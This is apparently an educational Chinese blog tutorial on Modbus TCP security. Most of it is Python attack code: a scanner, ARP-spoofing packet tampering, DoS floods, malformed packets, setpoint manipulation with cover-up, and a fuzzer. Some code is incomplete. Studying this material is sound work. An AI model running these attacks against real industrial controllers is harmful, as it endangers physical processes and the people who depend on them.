Modbus TCP 深度解析 (五):安全威脅與攻擊手法分析

0x00 前情提要

前一集中,我們學習了錯誤處理和診斷技術。今天我們要從資安的角度深入分析 Modbus TCP 的安全威脅,這對於保護工控系統至關重要。

上集練習題答案:

練習 3:錯誤封包分析

00 05 00 00 00 03 01 86 03

解析:
- Transaction ID: 0x0005
- 錯誤功能碼: 0x86 (0x06 + 0x80) = 寫入單個暫存器錯誤
- 異常碼: 0x03 = Illegal Data Value
- 問題:嘗試寫入的數值超出允許範圍

0x01 Modbus TCP 安全弱點分析

協議層面的安全缺陷

Modbus TCP 協議設計於工業環境安全性要求較低的年代,存在以下根本性安全問題:

┌─────────────────────────────────────────────────────────┐
│                  Modbus TCP 安全弱點                      │
├─────────────────┬───────────────────────────────────────┤
│ 認證機制        │ ❌ 無內建身份驗證                        │
│ 加密保護        │ ❌ 明文傳輸,無加密機制                  │
│ 授權控制        │ ❌ 無存取權限控制                        │
│ 完整性檢查      │ ❌ 無資料完整性驗證                      │
│ 防重放攻擊      │ ❌ 無時間戳或序號保護                    │
│ 會話管理        │ ❌ 無安全會話機制                        │
└─────────────────┴───────────────────────────────────────┘

攻擊面分析

網路層 ←→ TCP 層 ←→ Modbus 應用層 ←→ 設備層
   ↓        ↓           ↓            ↓
網路掃描   連線洪水    協議攻擊      設備控制
ARP 偽造   TCP 劫持    功能碼濫用    參數篡改
         連線注入    資料注入      韌體攻擊

0x02 網路層攻擊技術

網路探測與指紋識別

攻擊者首先會進行網路偵察,識別 Modbus 設備:

import socket
import struct
import threading
from concurrent.futures import ThreadPoolExecutor

class ModbusScanner:
    def __init__(self):
        self.discovered_devices = []
        self.timeout = 3

    def scan_single_ip(self, ip):
        """掃描單一 IP 的 Modbus 服務"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)

            # 嘗試連線到 502 埠
            result = sock.connect_ex((ip, 502))

            if result == 0:
                # 發送簡單的 Modbus 請求探測
                device_info = self.probe_modbus_device(sock, ip)
                if device_info:
                    self.discovered_devices.append(device_info)

            sock.close()

        except Exception as e:
            pass  # 忽略錯誤,繼續掃描

    def probe_modbus_device(self, sock, ip):
        """探測 Modbus 設備資訊"""
        try:
            # 構建設備識別請求 (功能碼 0x2B)
            # MEI Type 0x0E: Read Device Identification
            request = struct.pack('>HHHBBBBBB',
                1,      # Transaction ID
                0,      # Protocol ID
                5,      # Length
                1,      # Unit ID
                0x2B,   # Function Code
                0x0E,   # MEI Type
                0x01,   # Read Device ID Code
                0x00    # Object ID (Vendor Name)
            )

            sock.send(request)
            response = sock.recv(1024)

            if len(response) > 8:
                device_info = {
                    'ip': ip,
                    'port': 502,
                    'responding': True,
                    'details': self.parse_device_identification(response)
                }
                return device_info
            else:
                # 即使沒有設備識別回應,仍然是 Modbus 設備
                return {
                    'ip': ip,
                    'port': 502,
                    'responding': True,
                    'details': {}
                }

        except Exception:
            return None

    def parse_device_identification(self, response):
        """解析設備識別回應"""
        try:
            if len(response) < 10:
                return {}

            # 跳過 MBAP Header 和功能碼
            data = response[8:]

            if len(data) < 4:
                return {}

            mei_type = data[0]
            read_code = data[1]
            conformity = data[2]

            # 解析物件清單
            objects = {}
            offset = 6  # 跳到物件資料

            while offset < len(data):
                if offset + 2 > len(data):
                    break

                obj_id = data[offset]
                obj_len = data[offset + 1]
                offset += 2

                if offset + obj_len > len(data):
                    break

                obj_value = data[offset:offset + obj_len].decode('ascii', errors='ignore')
                objects[obj_id] = obj_value
                offset += obj_len

            return {
                'vendor_name': objects.get(0x00, 'Unknown'),
                'product_code': objects.get(0x01, 'Unknown'),
                'major_minor_version': objects.get(0x02, 'Unknown')
            }

        except Exception:
            return {}

    def scan_network(self, network_range):
        """掃描整個網路範圍"""
        print(f"正在掃描網路範圍: {network_range}")

        # 解析網路範圍 (例如: "192.168.1.1-254")
        if '-' in network_range:
            base_ip, range_part = network_range.rsplit('.', 1)
            start, end = map(int, range_part.split('-'))

            ips = [f"{base_ip}.{i}" for i in range(start, end + 1)]
        else:
            # 單一 IP
            ips = [network_range]

        # 多執行緒掃描
        with ThreadPoolExecutor(max_workers=50) as executor:
            executor.map(self.scan_single_ip, ips)

        return self.discovered_devices

# 使用範例
def network_reconnaissance():
    scanner = ModbusScanner()

    # 掃描常見的工控網路範圍
    target_networks = [
        "192.168.1.1-254",
        "10.0.0.1-254",
        "172.16.0.1-254"
    ]

    all_devices = []
    for network in target_networks:
        devices = scanner.scan_network(network)
        all_devices.extend(devices)

    # 輸出發現的設備
    print(f"\n發現 {len(all_devices)} 個 Modbus 設備:")
    for device in all_devices:
        print(f"IP: {device['ip']}")
        if device['details']:
            for key, value in device['details'].items():
                print(f"  {key}: {value}")
        print()

    return all_devices

# 進階指紋識別
def advanced_fingerprinting(ip):
    """進階設備指紋識別"""
    fingerprint_tests = [
        # 測試 1: 檢查支援的功能碼
        {
            'name': 'Function Code Support',
            'test': lambda client: test_function_codes(client),
        },
        # 測試 2: 記憶體佈局探測
        {
            'name': 'Memory Layout',
            'test': lambda client: probe_memory_layout(client),
        },
        # 測試 3: 錯誤回應模式
        {
            'name': 'Error Response Pattern',
            'test': lambda client: analyze_error_patterns(client),
        }
    ]

    results = {}
    client = ModbusTCPClient(ip)

    try:
        client.connect()

        for test in fingerprint_tests:
            try:
                results[test['name']] = test['test'](client)
            except Exception as e:
                results[test['name']] = f"測試失敗: {e}"

    finally:
        client.close()

    return results

def test_function_codes(client):
    """測試支援的功能碼"""
    function_codes = [0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x0F, 0x10, 0x2B]
    supported = []

    for fc in function_codes:
        try:
            # 發送最小的測試請求
            if fc == 0x03:  # Read Holding Registers
                client.read_holding_registers(0, 1)
                supported.append(f"0x{fc:02X}")
        except ModbusException as e:
            if e.exception_code != 0x01:  # 不是 Illegal Function
                supported.append(f"0x{fc:02X}")
        except Exception:
            pass

    return supported

中間人攻擊 (Man-in-the-Middle)

import scapy.all as scapy
from scapy.layers.inet import IP, TCP

class ModbusMITM:
    def __init__(self, target_ip, gateway_ip, interface="eth0"):
        self.target_ip = target_ip
        self.gateway_ip = gateway_ip
        self.interface = interface
        self.intercepted_packets = []

    def arp_spoof(self, target_ip, spoof_ip):
        """ARP 欺騙攻擊"""
        target_mac = self.get_mac(target_ip)
        if target_mac:
            packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
            scapy.send(packet, verbose=False)

    def get_mac(self, ip):
        """取得 MAC 地址"""
        arp_request = scapy.ARP(pdst=ip)
        broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
        arp_request_broadcast = broadcast / arp_request
        answered_list = scapy.srp(arp_request_broadcast, timeout=2, verbose=False)[0]

        if answered_list:
            return answered_list[0][1].hwsrc
        return None

    def packet_callback(self, packet):
        """封包攔截回調函數"""
        if packet.haslayer(TCP) and packet[TCP].dport == 502:
            # 攔截到 Modbus TCP 封包
            self.intercepted_packets.append(packet)
            self.analyze_and_modify_packet(packet)

    def analyze_and_modify_packet(self, packet):
        """分析並修改封包"""
        try:
            tcp_payload = bytes(packet[TCP].payload)

            if len(tcp_payload) >= 8:  # 最小 Modbus TCP 封包
                # 解析 MBAP Header
                tid, pid, length, uid = struct.unpack('>HHHB', tcp_payload[:7])
                function_code = tcp_payload[7]

                print(f"攔截 Modbus 封包:")
                print(f"  Transaction ID: {tid}")
                print(f"  功能碼: 0x{function_code:02X}")

                # 修改封包的範例
                if function_code == 0x06:  # Write Single Register
                    if len(tcp_payload) >= 12:
                        address, value = struct.unpack('>HH', tcp_payload[8:12])
                        print(f"  寫入地址: {address}, 數值: {value}")

                        # 惡意修改:將所有寫入數值改為 0
                        modified_payload = tcp_payload[:10] + struct.pack('>H', 0)
                        packet[TCP].payload = modified_payload
                        print(f"  *** 已修改數值為 0 ***")

        except Exception as e:
            print(f"封包分析錯誤: {e}")

    def start_attack(self):
        """開始中間人攻擊"""
        print(f"開始 ARP 欺騙攻擊: {self.target_ip}")

        # 啟動 ARP 欺騙
        import threading

        def arp_spoof_thread():
            while True:
                self.arp_spoof(self.target_ip, self.gateway_ip)
                self.arp_spoof(self.gateway_ip, self.target_ip)
                time.sleep(2)

        spoof_thread = threading.Thread(target=arp_spoof_thread)
        spoof_thread.daemon = True
        spoof_thread.start()

        # 開始封包捕獲
        print("開始監聽封包...")
        scapy.sniff(iface=self.interface, prn=self.packet_callback,
                   filter="tcp port 502", store=False)

0x03 應用層攻擊技術

功能碼濫用攻擊

class ModbusAttacker:
    def __init__(self, target_ip, target_port=502):
        self.target_ip = target_ip
        self.target_port = target_port
        self.client = None

    def connect(self):
        """建立攻擊連線"""
        self.client = ModbusTCPClient(self.target_ip, self.target_port)
        self.client.connect()

    def reconnaissance_attack(self):
        """偵察攻擊 - 收集系統資訊"""
        print("正在執行偵察攻擊...")

        recon_results = {
            'device_info': {},
            'memory_map': {},
            'supported_functions': [],
            'error_patterns': {}
        }

        # 1. 設備識別
        try:
            device_info = self.device_identification()
            recon_results['device_info'] = device_info
            print(f"設備資訊: {device_info}")
        except Exception as e:
            print(f"設備識別失敗: {e}")

        # 2. 記憶體映射探測
        memory_map = self.probe_memory_ranges()
        recon_results['memory_map'] = memory_map

        # 3. 功能碼探測
        supported_funcs = self.probe_function_codes()
        recon_results['supported_functions'] = supported_funcs

        return recon_results

    def device_identification(self):
        """設備識別攻擊"""
        try:
            # MEI Type 0x0E: Read Device Identification
            request = struct.pack('>HHHBBBBBB',
                1, 0, 5, 1, 0x2B, 0x0E, 0x01, 0x00, 0x00
            )

            self.client.sock.send(request)
            response = self.client.sock.recv(1024)

            return self.parse_device_info(response)

        except Exception as e:
            return {"error": str(e)}

    def probe_memory_ranges(self):
        """記憶體範圍探測"""
        print("探測記憶體佈局...")

        memory_ranges = {
            'holding_registers': [],
            'input_registers': [],
            'coils': [],
            'discrete_inputs': []
        }

        # 探測保持暫存器
        for base_addr in range(0, 10000, 100):
            try:
                result = self.client.read_holding_registers(base_addr, 1)
                memory_ranges['holding_registers'].append({
                    'address': base_addr,
                    'accessible': True,
                    'value': result[0] if result else None
                })
                print(f"發現保持暫存器: {base_addr}")

            except ModbusException as e:
                if e.exception_code == 0x02:  # Illegal Data Address
                    continue
                memory_ranges['holding_registers'].append({
                    'address': base_addr,
                    'accessible': False,
                    'error': e.exception_code
                })
            except Exception:
                break

        return memory_ranges

    def denial_of_service_attack(self):
        """拒絕服務攻擊"""
        print("執行拒絕服務攻擊...")

        attack_methods = [
            self.connection_flood,
            self.malformed_packets,
            self.resource_exhaustion
        ]

        for method in attack_methods:
            try:
                print(f"嘗試攻擊方法: {method.__name__}")
                method()
            except Exception as e:
                print(f"攻擊方法 {method.__name__} 失敗: {e}")

    def connection_flood(self):
        """連線洪水攻擊"""
        connections = []

        try:
            for i in range(100):  # 建立大量連線
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.connect((self.target_ip, self.target_port))
                connections.append(sock)

                if i % 10 == 0:
                    print(f"已建立 {i+1} 個連線")

            print("連線洪水攻擊執行中,保持連線...")
            time.sleep(30)  # 保持連線 30 秒

        finally:
            # 清理連線
            for sock in connections:
                try:
                    sock.close()
                except:
                    pass

    def malformed_packets(self):
        """畸形封包攻擊"""
        malformed_packets = [
            # 超長 Transaction ID
            b'\xFF' * 1000 + b'\x00\x00\x00\x06\x01\x03\x00\x00\x00\x01',

            # 無效 Length 欄位
            b'\x00\x01\x00\x00\xFF\xFF\x01\x03\x00\x00\x00\x01',

            # 畸形功能碼
            b'\x00\x01\x00\x00\x00\x06\x01\xFF\x00\x00\x00\x01',

            # 空封包
            b'',

            # 超大封包
            b'\x00\x01\x00\x00\x01\x00' + b'\x01' * 256 + b'\x03' + b'\x00' * 250
        ]

        for i, packet in enumerate(malformed_packets):
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.connect((self.target_ip, self.target_port))
                sock.send(packet)

                print(f"發送畸形封包 {i+1}")

                # 嘗試接收回應
                try:
                    response = sock.recv(1024)
                    print(f"  收到回應: {len(response)} bytes")
                except socket.timeout:
                    print("  無回應 (可能造成掛起)")

                sock.close()
                time.sleep(0.1)

            except Exception as e:
                print(f"  畸形封包 {i+1} 錯誤: {e}")

    def data_manipulation_attack(self):
        """資料操縱攻擊"""
        print("執行資料操縱攻擊...")

        # 攻擊場景:修改溫度設定點
        try:
            # 1. 讀取原始設定點
            original_temp = self.client.read_holding_registers(40001, 1)[0]
            print(f"原始溫度設定: {original_temp}")

            # 2. 惡意修改為危險值
            dangerous_temp = 9999  # 假設這是危險的高溫
            self.client.write_single_register(40001, dangerous_temp)
            print(f"已修改溫度設定為: {dangerous_temp}")

            # 3. 驗證修改
            new_temp = self.client.read_holding_registers(40001, 1)[0]
            print(f"確認新設定: {new_temp}")

            # 4. (可選) 恢復原始值以掩蓋攻擊
            time.sleep(5)  # 讓危險設定生效一段時間
            self.client.write_single_register(40001, original_temp)
            print(f"已恢復原始設定: {original_temp}")

        except Exception as e:
            print(f"資料操縱攻擊失敗: {e}")

    def persistent_backdoor(self):
        """植入持久性後門"""
        print("嘗試植入後門...")

        try:
            # 利用診斷功能植入後門
            # 這裡是概念性示範,實際後門會更複雜

            # 1. 檢查是否已有後門
            backdoor_check = self.client.read_holding_registers(49999, 1)[0]

            if backdoor_check == 0xDEAD:
                print("後門已存在")
                return True

            # 2. 植入後門標記
            self.client.write_single_register(49999, 0xDEAD)

            # 3. 設定後門觸發條件
            # 當特定暫存器被設為特定值時,執行後門功能
            self.client.write_single_register(49998, 0xBEEF)

            print("後門植入成功")
            return True

        except Exception as e:
            print(f"後門植入失敗: {e}")
            return False

# 攻擊執行範例
def execute_attack_scenario():
    """執行完整攻擊場景"""
    target_ip = "192.168.1.100"  # 目標 PLC IP

    attacker = ModbusAttacker(target_ip)

    try:
        attacker.connect()
        print(f"已連線到目標: {target_ip}")

        # 階段 1: 偵察
        print("\n=== 階段 1: 偵察 ===")
        recon_data = attacker.reconnaissance_attack()

        # 階段 2: 漏洞利用
        print("\n=== 階段 2: 漏洞利用 ===")
        attacker.data_manipulation_attack()

        # 階段 3: 持久性
        print("\n=== 階段 3: 持久性 ===")
        attacker.persistent_backdoor()

        # 階段 4: 拒絕服務 (可選)
        print("\n=== 階段 4: 拒絕服務 ===")
        # attacker.denial_of_service_attack()  # 謹慎使用

    except Exception as e:
        print(f"攻擊執行錯誤: {e}")

    finally:
        if attacker.client:
            attacker.client.close()

0x04 模糊測試 (Fuzzing) 技術

import random
import itertools

class ModbusFuzzer:
    def __init__(self, target_ip, target_port=502):
        self.target_ip = target_ip
        self.target_port = target_port
        self.crashes_found = []
        self.anomalies_found = []

    def generate_fuzz_packets(self):
        """產生模糊測試封包"""
        fuzz_packets = []

        # 1. MBAP Header 模糊測試
        for tid in [0x0000, 0xFFFF, 0x8000]:
            for pid in [0x0000, 0xFFFF, 0x0001]:
                for length in [0x0000, 0x0001, 0x00FF, 0xFFFF]:
                    for uid in [0x00, 0x01, 0xFF]:
                        mbap = struct.pack('>HHHB', tid, pid, length, uid)
                        fuzz_packets.append(mbap)

        # 2. 功能碼模糊測試
        function_codes = list(range(256))  # 0x00 - 0xFF

        # 3. 資料欄位模糊測試
        data_patterns = [
            b'',  # 空資料
            b'\x00',  # 單一零位元組
            b'\xFF',  # 單一 0xFF
            b'\x00' * 100,  # 大量零
            b'\xFF' * 100,  # 大量 0xFF
            b'\xAA' * 50,   # 交替模式
            b'\x55' * 50,   # 另一個交替模式
            os.urandom(50),  # 隨機資料
        ]

        return fuzz_packets, function_codes, data_patterns

    def fuzz_test_single_packet(self, packet):
        """測試單一模糊封包"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((self.target_ip, self.target_port))

            start_time = time.time()
            sock.send(packet)

            try:
                response = sock.recv(1024)
                response_time = time.time() - start_time

                # 分析回應
                result = {
                    'packet': packet.hex(),
                    'response': response.hex() if response else None,
                    'response_time': response_time,
                    'status': 'normal'
                }

                # 檢測異常
                if response_time > 2.0:  # 回應時間過長
                    result['status'] = 'slow_response'
                    self.anomalies_found.append(result)

                if len(response) == 0:  # 無回應
                    result['status'] = 'no_response'
                    self.anomalies_found.append(result)

                return result

            except socket.timeout:
                result = {
                    'packet': packet.hex(),
                    'response': None,
                    'status': 'timeout',
                    'response_time': 5.0
                }
                self.anomalies_found.append(result)
                return result

        except ConnectionRefusedError:
            # 可能的崩潰指標
            result = {
                'packet': packet.hex(),
                'status': 'connection_refused'
            }
            self.crashes_found.append(result)
            return result

        except Exception as e:
            result = {
                'packet': packet.hex(),
                'status': 'error',
                'error': str(e)
            }
            return result

        finally:
            try:
                sock.close()
            except:
                pass

    def comprehensive_fuzz_test(self):
        """全面模糊測試"""
        print("開始全面模糊測試...")

        fuzz_packets, function_codes, data_patterns = self.generate_fuzz_packets()

        test_count = 0

        # 測試所有組合
        for mbap in fuzz_packets[:10]:  # 限制 MBAP 變化
            for fc in function_codes[:20]:  # 限制功能碼
                for data in data_patterns[:5]:  # 限制資料模式

                    # 構建完整封包
                    packet = mbap + struct.pack('B', fc) + data

                    result = self.fuzz_test_single_packet(packet)
                    test_count += 1

                    if test_count % 100 == 0:
                        print(f"已測試 {test_count} 個封包...")

                    # 檢查是否發現嚴重問題
                    if result['status'] in ['connection_refused', 'timeout']:
                        print(f"發現潛在問題: {result['status']}")
                        print(f"問題封包: {result['packet']}")

        # 輸出測試結果
        self.report_fuzz_results()

    def report_fuzz_results(self):
        """報告模糊測試結果"""
        print("\n=== 模糊測試結果 ===")
        print(f"發現崩潰: {len(self.crashes_found)}")
        print(f"發現異常: {len(self.anomalies_found)}")

        if self.crashes_found:
            print("\n崩潰封包:")
            for crash in self.crashes_found[:5]:  # 只顯示前 5 個
                print(f"  {crash['packet']}")

        if self.anomalies_found:
            print("\n異常回應:")
            for anomaly in self.anomalies_found[:5]:
                print(f"  狀態: {anomaly['status']}")
                print(f"  封包: {anomaly['packet']}")

# 專門的漏洞挖掘
def vulnerability_discovery():
    """漏洞挖掘程序"""
    target_ip = "192.168.1.100"

    # 1. 基本模糊測試
    fuzzer = ModbusFuzzer(target_ip)
    fuzzer.comprehensive_fuzz_test()

    # 2. 特定協議欄位測試
    specific_tests = [
        test_transaction_id_overflow,
        test_length_field_manipulation,
        test_unit_id_boundary,
        test_function_code_edge_cases
    ]

    for test in specific_tests:
        try:
            test(target_ip)
        except Exception as e:
            print(f"測試 {test.__name__} 失敗: {e}")

def test_transaction_id_overflow(target_ip):
    """測試 Transaction ID 溢位"""
    print("測試 Transaction ID 溢位...")

    client = ModbusTCPClient(target_ip)
    client.connect()

    try:
        # 測試邊界值
        boundary_values = [0, 1, 32767, 32768, 65535, 65536]

        for tid in boundary_values:
            # 手動構建封包以控制 Transaction ID
            packet = struct.pack('>HHHBBHH',
                tid & 0xFFFF,  # Transaction ID (截斷到 16 位)
                0,             # Protocol ID
                6,             # Length
                1,             # Unit ID
                3,             # Function Code
                0,             # Address
                1              # Quantity
            )

            client.sock.send(packet)
            response = client.sock.recv(1024)

            print(f"Transaction ID {tid}: 正常回應")

    except Exception as e:
        print(f"Transaction ID 測試發現異常: {e}")

    finally:
        client.close()

0x05 下集預告

在最後一集《防護策略與最佳實務》中,我們將學習:

  • 網路層防護措施
  • 應用層安全加固
  • 監控和檢測技術
  • 事件回應和恢復策略

0x06 實作練習

練習 1: 實作一個 Modbus 蜜罐,記錄攻擊者的行為模式。

練習 2: 設計一個攻擊檢測系統,能識別異常的 Modbus 流量。

練習 3: 分析實際的 Modbus 攻擊流量,識別攻擊技術。

⚠️ 安全提醒: 本文內容僅供教育和研究目的,請勿用於未經授權的系統。


本文為 Modbus TCP 深度解析系列第五篇,下集將完成防護策略的完整指南!

聯絡作者

歡迎透過以上方式與我交流資安技術與 CTF 心得!